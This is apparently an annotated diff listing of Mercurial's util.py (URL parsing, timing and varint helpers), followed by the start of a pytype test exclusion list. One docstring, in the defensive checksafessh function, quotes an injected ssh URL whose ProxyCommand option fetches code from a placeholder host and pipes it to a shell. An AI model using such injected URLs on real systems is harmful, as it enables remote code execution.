2944 2947 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2945 2948 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2946 2949
2947 2950
2948 2951 def getport(port):
2949 2952 # type: (Union[bytes, int]) -> int
2950 2953 """Return the port for a given network service.
2951 2954
2952 2955 If port is an integer, it's returned as is. If it's a string, it's
2953 2956 looked up using socket.getservbyname(). If there's no matching
2954 2957 service, error.Abort is raised.
2955 2958 """
2956 2959 try:
2957 2960 return int(port)
2958 2961 except ValueError:
2959 2962 pass
2960 2963
2961 2964 try:
2962 2965 return socket.getservbyname(pycompat.sysstr(port))
2963 2966 except socket.error:
2964 2967 raise error.Abort(
2965 2968 _(b"no port number associated with service '%s'") % port
2966 2969 )
2967 2970
2968 2971
2969 2972 class url(object):
2970 2973 r"""Reliable URL parser.
2971 2974
2972 2975 This parses URLs and provides attributes for the following
2973 2976 components:
2974 2977
2975 2978 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2976 2979
2977 2980 Missing components are set to None. The only exception is
2978 2981 fragment, which is set to '' if present but empty.
2979 2982
2980 2983 If parsefragment is False, fragment is included in query. If
2981 2984 parsequery is False, query is included in path. If both are
2982 2985 False, both fragment and query are included in path.
2983 2986
2984 2987 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2985 2988
2986 2989 Note that for backward compatibility reasons, bundle URLs do not
2987 2990 take host names. That means 'bundle://../' has a path of '../'.
2988 2991
2989 2992 Examples:
2990 2993
2991 2994 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2992 2995 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2993 2996 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2994 2997 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2995 2998 >>> url(b'file:///home/joe/repo')
2996 2999 <url scheme: 'file', path: '/home/joe/repo'>
2997 3000 >>> url(b'file:///c:/temp/foo/')
2998 3001 <url scheme: 'file', path: 'c:/temp/foo/'>
2999 3002 >>> url(b'bundle:foo')
3000 3003 <url scheme: 'bundle', path: 'foo'>
3001 3004 >>> url(b'bundle://../foo')
3002 3005 <url scheme: 'bundle', path: '../foo'>
3003 3006 >>> url(br'c:\foo\bar')
3004 3007 <url path: 'c:\\foo\\bar'>
3005 3008 >>> url(br'\\blah\blah\blah')
3006 3009 <url path: '\\\\blah\\blah\\blah'>
3007 3010 >>> url(br'\\blah\blah\blah#baz')
3008 3011 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3009 3012 >>> url(br'file:///C:\users\me')
3010 3013 <url scheme: 'file', path: 'C:\\users\\me'>
3011 3014
3012 3015 Authentication credentials:
3013 3016
3014 3017 >>> url(b'ssh://joe:xyz@x/repo')
3015 3018 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3016 3019 >>> url(b'ssh://joe@x/repo')
3017 3020 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3018 3021
3019 3022 Query strings and fragments:
3020 3023
3021 3024 >>> url(b'http://host/a?b#c')
3022 3025 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3023 3026 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3024 3027 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3025 3028
3026 3029 Empty path:
3027 3030
3028 3031 >>> url(b'')
3029 3032 <url path: ''>
3030 3033 >>> url(b'#a')
3031 3034 <url path: '', fragment: 'a'>
3032 3035 >>> url(b'http://host/')
3033 3036 <url scheme: 'http', host: 'host', path: ''>
3034 3037 >>> url(b'http://host/#a')
3035 3038 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3036 3039
3037 3040 Only scheme:
3038 3041
3039 3042 >>> url(b'http:')
3040 3043 <url scheme: 'http'>
3041 3044 """
3042 3045
3043 3046 _safechars = b"!~*'()+"
3044 3047 _safepchars = b"/!~*'()+:\\"
3045 3048 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3046 3049
3047 3050 def __init__(self, path, parsequery=True, parsefragment=True):
3048 3051 # type: (bytes, bool, bool) -> None
3049 3052 # We slowly chomp away at path until we have only the path left
3050 3053 self.scheme = self.user = self.passwd = self.host = None
3051 3054 self.port = self.path = self.query = self.fragment = None
3052 3055 self._localpath = True
3053 3056 self._hostport = b''
3054 3057 self._origpath = path
3055 3058
3056 3059 if parsefragment and b'#' in path:
3057 3060 path, self.fragment = path.split(b'#', 1)
3058 3061
3059 3062 # special case for Windows drive letters and UNC paths
3060 3063 if hasdriveletter(path) or path.startswith(b'\\\\'):
3061 3064 self.path = path
3062 3065 return
3063 3066
3064 3067 # For compatibility reasons, we can't handle bundle paths as
3065 3068 # normal URLS
3066 3069 if path.startswith(b'bundle:'):
3067 3070 self.scheme = b'bundle'
3068 3071 path = path[7:]
3069 3072 if path.startswith(b'//'):
3070 3073 path = path[2:]
3071 3074 self.path = path
3072 3075 return
3073 3076
3074 3077 if self._matchscheme(path):
3075 3078 parts = path.split(b':', 1)
3076 3079 if parts[0]:
3077 3080 self.scheme, path = parts
3078 3081 self._localpath = False
3079 3082
3080 3083 if not path:
3081 3084 path = None
3082 3085 if self._localpath:
3083 3086 self.path = b''
3084 3087 return
3085 3088 else:
3086 3089 if self._localpath:
3087 3090 self.path = path
3088 3091 return
3089 3092
3090 3093 if parsequery and b'?' in path:
3091 3094 path, self.query = path.split(b'?', 1)
3092 3095 if not path:
3093 3096 path = None
3094 3097 if not self.query:
3095 3098 self.query = None
3096 3099
3097 3100 # // is required to specify a host/authority
3098 3101 if path and path.startswith(b'//'):
3099 3102 parts = path[2:].split(b'/', 1)
3100 3103 if len(parts) > 1:
3101 3104 self.host, path = parts
3102 3105 else:
3103 3106 self.host = parts[0]
3104 3107 path = None
3105 3108 if not self.host:
3106 3109 self.host = None
3107 3110 # path of file:///d is /d
3108 3111 # path of file:///d:/ is d:/, not /d:/
3109 3112 if path and not hasdriveletter(path):
3110 3113 path = b'/' + path
3111 3114
3112 3115 if self.host and b'@' in self.host:
3113 3116 self.user, self.host = self.host.rsplit(b'@', 1)
3114 3117 if b':' in self.user:
3115 3118 self.user, self.passwd = self.user.split(b':', 1)
3116 3119 if not self.host:
3117 3120 self.host = None
3118 3121
3119 3122 # Don't split on colons in IPv6 addresses without ports
3120 3123 if (
3121 3124 self.host
3122 3125 and b':' in self.host
3123 3126 and not (
3124 3127 self.host.startswith(b'[') and self.host.endswith(b']')
3125 3128 )
3126 3129 ):
3127 3130 self._hostport = self.host
3128 3131 self.host, self.port = self.host.rsplit(b':', 1)
3129 3132 if not self.host:
3130 3133 self.host = None
3131 3134
3132 3135 if (
3133 3136 self.host
3134 3137 and self.scheme == b'file'
3135 3138 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3136 3139 ):
3137 3140 raise error.Abort(
3138 3141 _(b'file:// URLs can only refer to localhost')
3139 3142 )
3140 3143
3141 3144 self.path = path
3142 3145
3143 3146 # leave the query string escaped
3144 3147 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3145 3148 v = getattr(self, a)
3146 3149 if v is not None:
3147 3150 setattr(self, a, urlreq.unquote(v))
3148 3151
3149 3152 def copy(self):
3150 3153 u = url(b'temporary useless value')
3151 3154 u.path = self.path
3152 3155 u.scheme = self.scheme
3153 3156 u.user = self.user
3154 3157 u.passwd = self.passwd
3155 3158 u.host = self.host
3156 3159 u.path = self.path
3157 3160 u.query = self.query
3158 3161 u.fragment = self.fragment
3159 3162 u._localpath = self._localpath
3160 3163 u._hostport = self._hostport
3161 3164 u._origpath = self._origpath
3162 3165 return u
3163 3166
3164 3167 @encoding.strmethod
3165 3168 def __repr__(self):
3166 3169 attrs = []
3167 3170 for a in (
3168 3171 b'scheme',
3169 3172 b'user',
3170 3173 b'passwd',
3171 3174 b'host',
3172 3175 b'port',
3173 3176 b'path',
3174 3177 b'query',
3175 3178 b'fragment',
3176 3179 ):
3177 3180 v = getattr(self, a)
3178 3181 if v is not None:
3179 3182 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3180 3183 return b'<url %s>' % b', '.join(attrs)
3181 3184
3182 3185 def __bytes__(self):
3183 3186 r"""Join the URL's components back into a URL string.
3184 3187
3185 3188 Examples:
3186 3189
3187 3190 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3188 3191 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3189 3192 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3190 3193 'http://user:pw@host:80/?foo=bar&baz=42'
3191 3194 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3192 3195 'http://user:pw@host:80/?foo=bar%3dbaz'
3193 3196 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3194 3197 'ssh://user:pw@[::1]:2200//home/joe#'
3195 3198 >>> bytes(url(b'http://localhost:80//'))
3196 3199 'http://localhost:80//'
3197 3200 >>> bytes(url(b'http://localhost:80/'))
3198 3201 'http://localhost:80/'
3199 3202 >>> bytes(url(b'http://localhost:80'))
3200 3203 'http://localhost:80/'
3201 3204 >>> bytes(url(b'bundle:foo'))
3202 3205 'bundle:foo'
3203 3206 >>> bytes(url(b'bundle://../foo'))
3204 3207 'bundle:../foo'
3205 3208 >>> bytes(url(b'path'))
3206 3209 'path'
3207 3210 >>> bytes(url(b'file:///tmp/foo/bar'))
3208 3211 'file:///tmp/foo/bar'
3209 3212 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3210 3213 'file:///c:/tmp/foo/bar'
3211 3214 >>> print(url(br'bundle:foo\bar'))
3212 3215 bundle:foo\bar
3213 3216 >>> print(url(br'file:///D:\data\hg'))
3214 3217 file:///D:\data\hg
3215 3218 """
3216 3219 if self._localpath:
3217 3220 s = self.path
3218 3221 if self.scheme == b'bundle':
3219 3222 s = b'bundle:' + s
3220 3223 if self.fragment:
3221 3224 s += b'#' + self.fragment
3222 3225 return s
3223 3226
3224 3227 s = self.scheme + b':'
3225 3228 if self.user or self.passwd or self.host:
3226 3229 s += b'//'
3227 3230 elif self.scheme and (
3228 3231 not self.path
3229 3232 or self.path.startswith(b'/')
3230 3233 or hasdriveletter(self.path)
3231 3234 ):
3232 3235 s += b'//'
3233 3236 if hasdriveletter(self.path):
3234 3237 s += b'/'
3235 3238 if self.user:
3236 3239 s += urlreq.quote(self.user, safe=self._safechars)
3237 3240 if self.passwd:
3238 3241 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3239 3242 if self.user or self.passwd:
3240 3243 s += b'@'
3241 3244 if self.host:
3242 3245 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3243 3246 s += urlreq.quote(self.host)
3244 3247 else:
3245 3248 s += self.host
3246 3249 if self.port:
3247 3250 s += b':' + urlreq.quote(self.port)
3248 3251 if self.host:
3249 3252 s += b'/'
3250 3253 if self.path:
3251 3254 # TODO: similar to the query string, we should not unescape the
3252 3255 # path when we store it, the path might contain '%2f' = '/',
3253 3256 # which we should *not* escape.
3254 3257 s += urlreq.quote(self.path, safe=self._safepchars)
3255 3258 if self.query:
3256 3259 # we store the query in escaped form.
3257 3260 s += b'?' + self.query
3258 3261 if self.fragment is not None:
3259 3262 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3260 3263 return s
3261 3264
3262 3265 __str__ = encoding.strmethod(__bytes__)
3263 3266
3264 3267 def authinfo(self):
3265 3268 user, passwd = self.user, self.passwd
3266 3269 try:
3267 3270 self.user, self.passwd = None, None
3268 3271 s = bytes(self)
3269 3272 finally:
3270 3273 self.user, self.passwd = user, passwd
3271 3274 if not self.user:
3272 3275 return (s, None)
3273 3276 # authinfo[1] is passed to urllib2 password manager, and its
3274 3277 # URIs must not contain credentials. The host is passed in the
3275 3278 # URIs list because Python < 2.4.3 uses only that to search for
3276 3279 # a password.
3277 3280 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3278 3281
3279 3282 def isabs(self):
3280 3283 if self.scheme and self.scheme != b'file':
3281 3284 return True # remote URL
3282 3285 if hasdriveletter(self.path):
3283 3286 return True # absolute for our purposes - can't be joined()
3284 3287 if self.path.startswith(br'\\'):
3285 3288 return True # Windows UNC path
3286 3289 if self.path.startswith(b'/'):
3287 3290 return True # POSIX-style
3288 3291 return False
3289 3292
3290 3293 def localpath(self):
3291 3294 # type: () -> bytes
3292 3295 if self.scheme == b'file' or self.scheme == b'bundle':
3293 3296 path = self.path or b'/'
3294 3297 # For Windows, we need to promote hosts containing drive
3295 3298 # letters to paths with drive letters.
3296 3299 if hasdriveletter(self._hostport):
3297 3300 path = self._hostport + b'/' + self.path
3298 3301 elif (
3299 3302 self.host is not None and self.path and not hasdriveletter(path)
3300 3303 ):
3301 3304 path = b'/' + path
3302 3305 return path
3303 3306 return self._origpath
3304 3307
3305 3308 def islocal(self):
3306 3309 '''whether localpath will return something that posixfile can open'''
3307 3310 return (
3308 3311 not self.scheme
3309 3312 or self.scheme == b'file'
3310 3313 or self.scheme == b'bundle'
3311 3314 )
3312 3315
3313 3316
3314 3317 def hasscheme(path):
3315 3318 # type: (bytes) -> bool
3316 3319 return bool(url(path).scheme) # cast to help pytype
3317 3320
3318 3321
3319 3322 def hasdriveletter(path):
3320 3323 # type: (bytes) -> bool
3321 3324 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3322 3325
3323 3326
3324 3327 def urllocalpath(path):
3325 3328 # type: (bytes) -> bytes
3326 3329 return url(path, parsequery=False, parsefragment=False).localpath()
3327 3330
3328 3331
3329 3332 def checksafessh(path):
3330 3333 # type: (bytes) -> None
3331 3334 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3332 3335
3333 3336 This is a sanity check for ssh urls. ssh will parse the first item as
3334 3337 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3335 3338 Let's prevent these potentially exploited urls entirely and warn the
3336 3339 user.
3337 3340
3338 3341 Raises an error.Abort when the url is unsafe.
3339 3342 """
3340 3343 path = urlreq.unquote(path)
3341 3344 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3342 3345 raise error.Abort(
3343 3346 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3344 3347 )
3345 3348
3346 3349
3347 3350 def hidepassword(u):
3348 3351 # type: (bytes) -> bytes
3349 3352 '''hide user credential in a url string'''
3350 3353 u = url(u)
3351 3354 if u.passwd:
3352 3355 u.passwd = b'***'
3353 3356 return bytes(u)
3354 3357
3355 3358
3356 3359 def removeauth(u):
3357 3360 # type: (bytes) -> bytes
3358 3361 '''remove all authentication information from a url string'''
3359 3362 u = url(u)
3360 3363 u.user = u.passwd = None
3361 3364 return bytes(u)
3362 3365
3363 3366
3364 3367 timecount = unitcountfn(
3365 3368 (1, 1e3, _(b'%.0f s')),
3366 3369 (100, 1, _(b'%.1f s')),
3367 3370 (10, 1, _(b'%.2f s')),
3368 3371 (1, 1, _(b'%.3f s')),
3369 3372 (100, 0.001, _(b'%.1f ms')),
3370 3373 (10, 0.001, _(b'%.2f ms')),
3371 3374 (1, 0.001, _(b'%.3f ms')),
3372 3375 (100, 0.000001, _(b'%.1f us')),
3373 3376 (10, 0.000001, _(b'%.2f us')),
3374 3377 (1, 0.000001, _(b'%.3f us')),
3375 3378 (100, 0.000000001, _(b'%.1f ns')),
3376 3379 (10, 0.000000001, _(b'%.2f ns')),
3377 3380 (1, 0.000000001, _(b'%.3f ns')),
3378 3381 )
3379 3382
3380 3383
3381 3384 @attr.s
3382 3385 class timedcmstats(object):
3383 3386 """Stats information produced by the timedcm context manager on entering."""
3384 3387
3385 3388 # the starting value of the timer as a float (meaning and resulution is
3386 3389 # platform dependent, see util.timer)
3387 3390 start = attr.ib(default=attr.Factory(lambda: timer()))
3388 3391 # the number of seconds as a floating point value; starts at 0, updated when
3389 3392 # the context is exited.
3390 3393 elapsed = attr.ib(default=0)
3391 3394 # the number of nested timedcm context managers.
3392 3395 level = attr.ib(default=1)
3393 3396
3394 3397 def __bytes__(self):
3395 3398 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3396 3399
3397 3400 __str__ = encoding.strmethod(__bytes__)
3398 3401
3399 3402
3400 3403 @contextlib.contextmanager
3401 3404 def timedcm(whencefmt, *whenceargs):
3402 3405 """A context manager that produces timing information for a given context.
3403 3406
3404 3407 On entering a timedcmstats instance is produced.
3405 3408
3406 3409 This context manager is reentrant.
3407 3410
3408 3411 """
3409 3412 # track nested context managers
3410 3413 timedcm._nested += 1
3411 3414 timing_stats = timedcmstats(level=timedcm._nested)
3412 3415 try:
3413 3416 with tracing.log(whencefmt, *whenceargs):
3414 3417 yield timing_stats
3415 3418 finally:
3416 3419 timing_stats.elapsed = timer() - timing_stats.start
3417 3420 timedcm._nested -= 1
3418 3421
3419 3422
3420 3423 timedcm._nested = 0
3421 3424
3422 3425
3423 3426 def timed(func):
3424 3427 """Report the execution time of a function call to stderr.
3425 3428
3426 3429 During development, use as a decorator when you need to measure
3427 3430 the cost of a function, e.g. as follows:
3428 3431
3429 3432 @util.timed
3430 3433 def foo(a, b, c):
3431 3434 pass
3432 3435 """
3433 3436
3434 3437 def wrapper(*args, **kwargs):
3435 3438 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3436 3439 result = func(*args, **kwargs)
3437 3440 stderr = procutil.stderr
3438 3441 stderr.write(
3439 3442 b'%s%s: %s\n'
3440 3443 % (
3441 3444 b' ' * time_stats.level * 2,
3442 3445 pycompat.bytestr(func.__name__),
3443 3446 time_stats,
3444 3447 )
3445 3448 )
3446 3449 return result
3447 3450
3448 3451 return wrapper
3449 3452
3450 3453
3451 3454 _sizeunits = (
3452 3455 (b'm', 2 ** 20),
3453 3456 (b'k', 2 ** 10),
3454 3457 (b'g', 2 ** 30),
3455 3458 (b'kb', 2 ** 10),
3456 3459 (b'mb', 2 ** 20),
3457 3460 (b'gb', 2 ** 30),
3458 3461 (b'b', 1),
3459 3462 )
3460 3463
3461 3464
3462 3465 def sizetoint(s):
3463 3466 # type: (bytes) -> int
3464 3467 """Convert a space specifier to a byte count.
3465 3468
3466 3469 >>> sizetoint(b'30')
3467 3470 30
3468 3471 >>> sizetoint(b'2.2kb')
3469 3472 2252
3470 3473 >>> sizetoint(b'6M')
3471 3474 6291456
3472 3475 """
3473 3476 t = s.strip().lower()
3474 3477 try:
3475 3478 for k, u in _sizeunits:
3476 3479 if t.endswith(k):
3477 3480 return int(float(t[: -len(k)]) * u)
3478 3481 return int(t)
3479 3482 except ValueError:
3480 3483 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3481 3484
3482 3485
3483 3486 class hooks(object):
3484 3487 """A collection of hook functions that can be used to extend a
3485 3488 function's behavior. Hooks are called in lexicographic order,
3486 3489 based on the names of their sources."""
3487 3490
3488 3491 def __init__(self):
3489 3492 self._hooks = []
3490 3493
3491 3494 def add(self, source, hook):
3492 3495 self._hooks.append((source, hook))
3493 3496
3494 3497 def __call__(self, *args):
3495 3498 self._hooks.sort(key=lambda x: x[0])
3496 3499 results = []
3497 3500 for source, hook in self._hooks:
3498 3501 results.append(hook(*args))
3499 3502 return results
3500 3503
3501 3504
3502 3505 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3503 3506 """Yields lines for a nicely formatted stacktrace.
3504 3507 Skips the 'skip' last entries, then return the last 'depth' entries.
3505 3508 Each file+linenumber is formatted according to fileline.
3506 3509 Each line is formatted according to line.
3507 3510 If line is None, it yields:
3508 3511 length of longest filepath+line number,
3509 3512 filepath+linenumber,
3510 3513 function
3511 3514
3512 3515 Not be used in production code but very convenient while developing.
3513 3516 """
3514 3517 entries = [
3515 3518 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3516 3519 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3517 3520 ][-depth:]
3518 3521 if entries:
3519 3522 fnmax = max(len(entry[0]) for entry in entries)
3520 3523 for fnln, func in entries:
3521 3524 if line is None:
3522 3525 yield (fnmax, fnln, func)
3523 3526 else:
3524 3527 yield line % (fnmax, fnln, func)
3525 3528
3526 3529
3527 3530 def debugstacktrace(
3528 3531 msg=b'stacktrace',
3529 3532 skip=0,
3530 3533 f=procutil.stderr,
3531 3534 otherf=procutil.stdout,
3532 3535 depth=0,
3533 3536 prefix=b'',
3534 3537 ):
3535 3538 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3536 3539 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3537 3540 By default it will flush stdout first.
3538 3541 It can be used everywhere and intentionally does not require an ui object.
3539 3542 Not be used in production code but very convenient while developing.
3540 3543 """
3541 3544 if otherf:
3542 3545 otherf.flush()
3543 3546 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3544 3547 for line in getstackframes(skip + 1, depth=depth):
3545 3548 f.write(prefix + line)
3546 3549 f.flush()
3547 3550
3548 3551
3549 3552 # convenient shortcut
3550 3553 dst = debugstacktrace
3551 3554
3552 3555
3553 3556 def safename(f, tag, ctx, others=None):
3554 3557 """
3555 3558 Generate a name that it is safe to rename f to in the given context.
3556 3559
3557 3560 f: filename to rename
3558 3561 tag: a string tag that will be included in the new name
3559 3562 ctx: a context, in which the new name must not exist
3560 3563 others: a set of other filenames that the new name must not be in
3561 3564
3562 3565 Returns a file name of the form oldname~tag[~number] which does not exist
3563 3566 in the provided context and is not in the set of other names.
3564 3567 """
3565 3568 if others is None:
3566 3569 others = set()
3567 3570
3568 3571 fn = b'%s~%s' % (f, tag)
3569 3572 if fn not in ctx and fn not in others:
3570 3573 return fn
3571 3574 for n in itertools.count(1):
3572 3575 fn = b'%s~%s~%s' % (f, tag, n)
3573 3576 if fn not in ctx and fn not in others:
3574 3577 return fn
3575 3578
3576 3579
3577 3580 def readexactly(stream, n):
3578 3581 '''read n bytes from stream.read and abort if less was available'''
3579 3582 s = stream.read(n)
3580 3583 if len(s) < n:
3581 3584 raise error.Abort(
3582 3585 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3583 3586 % (len(s), n)
3584 3587 )
3585 3588 return s
3586 3589
3587 3590
3588 3591 def uvarintencode(value):
3589 3592 """Encode an unsigned integer value to a varint.
3590 3593
3591 3594 A varint is a variable length integer of 1 or more bytes. Each byte
3592 3595 except the last has the most significant bit set. The lower 7 bits of
3593 3596 each byte store the 2's complement representation, least significant group
3594 3597 first.
3595 3598
3596 3599 >>> uvarintencode(0)
3597 3600 '\\x00'
3598 3601 >>> uvarintencode(1)
3599 3602 '\\x01'
3600 3603 >>> uvarintencode(127)
3601 3604 '\\x7f'
3602 3605 >>> uvarintencode(1337)
3603 3606 '\\xb9\\n'
3604 3607 >>> uvarintencode(65536)
3605 3608 '\\x80\\x80\\x04'
3606 3609 >>> uvarintencode(-1)
3607 3610 Traceback (most recent call last):
3608 3611 ...
3609 3612 ProgrammingError: negative value for uvarint: -1
3610 3613 """
3611 3614 if value < 0:
3612 3615 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3613 3616 bits = value & 0x7F
3614 3617 value >>= 7
3615 3618 bytes = []
3616 3619 while value:
3617 3620 bytes.append(pycompat.bytechr(0x80 | bits))
3618 3621 bits = value & 0x7F
3619 3622 value >>= 7
3620 3623 bytes.append(pycompat.bytechr(bits))
3621 3624
3622 3625 return b''.join(bytes)
3623 3626
3624 3627
3625 3628 def uvarintdecodestream(fh):
3626 3629 """Decode an unsigned variable length integer from a stream.
3627 3630
3628 3631 The passed argument is anything that has a ``.read(N)`` method.
3629 3632
3630 3633 >>> try:
3631 3634 ... from StringIO import StringIO as BytesIO
3632 3635 ... except ImportError:
3633 3636 ... from io import BytesIO
3634 3637 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3635 3638 0
3636 3639 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3637 3640 1
3638 3641 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3639 3642 127
3640 3643 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3641 3644 1337
3642 3645 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3643 3646 65536
3644 3647 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3645 3648 Traceback (most recent call last):
3646 3649 ...
3647 3650 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3648 3651 """
3649 3652 result = 0
3650 3653 shift = 0
3651 3654 while True:
3652 3655 byte = ord(readexactly(fh, 1))
3653 3656 result |= (byte & 0x7F) << shift
3654 3657 if not (byte & 0x80):
3655 3658 return result
3656 3659 shift += 7
3657 3660
3658 3661
3659 3662 # Passing the '' locale means that the locale should be set according to the
3660 3663 # user settings (environment variables).
3661 3664 # Python sometimes avoids setting the global locale settings. When interfacing
3662 3665 # with C code (e.g. the curses module or the Subversion bindings), the global
3663 3666 # locale settings must be initialized correctly. Python 2 does not initialize
3664 3667 # the global locale settings on interpreter startup. Python 3 sometimes
3665 3668 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3666 3669 # explicitly initialize it to get consistent behavior if it's not already
3667 3670 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3668 3671 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3669 3672 # if we can remove this code.
3670 3673 @contextlib.contextmanager
3671 3674 def with_lc_ctype():
3672 3675 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3673 3676 if oldloc == 'C':
3674 3677 try:
3675 3678 try:
3676 3679 locale.setlocale(locale.LC_CTYPE, '')
3677 3680 except locale.Error:
3678 3681 # The likely case is that the locale from the environment
3679 3682 # variables is unknown.
3680 3683 pass
3681 3684 yield
3682 3685 finally:
3683 3686 locale.setlocale(locale.LC_CTYPE, oldloc)
3684 3687 else:
3685 3688 yield
3686 3689
3687 3690
3688 3691 def _estimatememory():
3689 3692 # type: () -> Optional[int]
3690 3693 """Provide an estimate for the available system memory in Bytes.
3691 3694
3692 3695 If no estimate can be provided on the platform, returns None.
3693 3696 """
3694 3697 if pycompat.sysplatform.startswith(b'win'):
3695 3698 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3696 3699 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3697 3700 from ctypes.wintypes import ( # pytype: disable=import-error
3698 3701 Structure,
3699 3702 byref,
3700 3703 sizeof,
3701 3704 windll,
3702 3705 )
3703 3706
3704 3707 class MEMORYSTATUSEX(Structure):
3705 3708 _fields_ = [
3706 3709 ('dwLength', DWORD),
3707 3710 ('dwMemoryLoad', DWORD),
3708 3711 ('ullTotalPhys', DWORDLONG),
3709 3712 ('ullAvailPhys', DWORDLONG),
3710 3713 ('ullTotalPageFile', DWORDLONG),
3711 3714 ('ullAvailPageFile', DWORDLONG),
3712 3715 ('ullTotalVirtual', DWORDLONG),
3713 3716 ('ullAvailVirtual', DWORDLONG),
3714 3717 ('ullExtendedVirtual', DWORDLONG),
3715 3718 ]
3716 3719
3717 3720 x = MEMORYSTATUSEX()
3718 3721 x.dwLength = sizeof(x)
3719 3722 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3720 3723 return x.ullAvailPhys
3721 3724
3722 3725 # On newer Unix-like systems and Mac OSX, the sysconf interface
3723 3726 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3724 3727 # seems to be implemented on most systems.
3725 3728 try:
3726 3729 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3727 3730 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3728 3731 return pagesize * pages
3729 3732 except OSError: # sysconf can fail
3730 3733 pass
3731 3734 except KeyError: # unknown parameter
3732 3735 pass
@@ -1,105 +1,104 b''
1 1 #require pytype py3 slow
2 2
3 3 $ cd $RUNTESTDIR/..
4 4
5 5 Many of the individual files that are excluded here confuse pytype
6 6 because they do a mix of Python 2 and Python 3 things
7 7 conditionally. There's no good way to help it out with that as far as
8 8 I can tell, so let's just hide those files from it for now. We should
9 9 endeavor to empty this list out over time, as some of these are
10 10 probably hiding real problems.
11 11
12 12 mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo
13 13 mercurial/changegroup.py # mysterious incorrect type detection
14 14 mercurial/chgserver.py # [attribute-error]
15 15 mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error]
16 16 mercurial/context.py # many [attribute-error]
17 17 mercurial/copies.py # No attribute 'items' on None [attribute-error]
18 18 mercurial/crecord.py # tons of [attribute-error], [module-attr]
19 19 mercurial/debugcommands.py # [wrong-arg-types]
20 20 mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error]
21 21 mercurial/exchange.py # [attribute-error]
22 22 mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types]
23 23 mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr]
24 24 mercurial/hgweb/webcommands.py # [missing-parameter]
25 25 mercurial/hgweb/wsgicgi.py # confused values in os.environ
26 26 mercurial/httppeer.py # [attribute-error], [wrong-arg-types]
27 27 mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error]
28 28 mercurial/keepalive.py # [attribute-error]
29 29 mercurial/localrepo.py # [attribute-error]
30 30 mercurial/lsprof.py # unguarded import
31 31 mercurial/manifest.py # [unsupported-operands], [wrong-arg-types]
32 32 mercurial/minirst.py # [unsupported-operands], [attribute-error]
33 33 mercurial/patch.py # [wrong-arg-types]
34 34 mercurial/pure/osutil.py # [invalid-typevar], [not-callable]
35 35 mercurial/pure/parsers.py # [attribute-error]
36 36 mercurial/pycompat.py # bytes vs str issues
37 37 mercurial/repoview.py # [attribute-error]
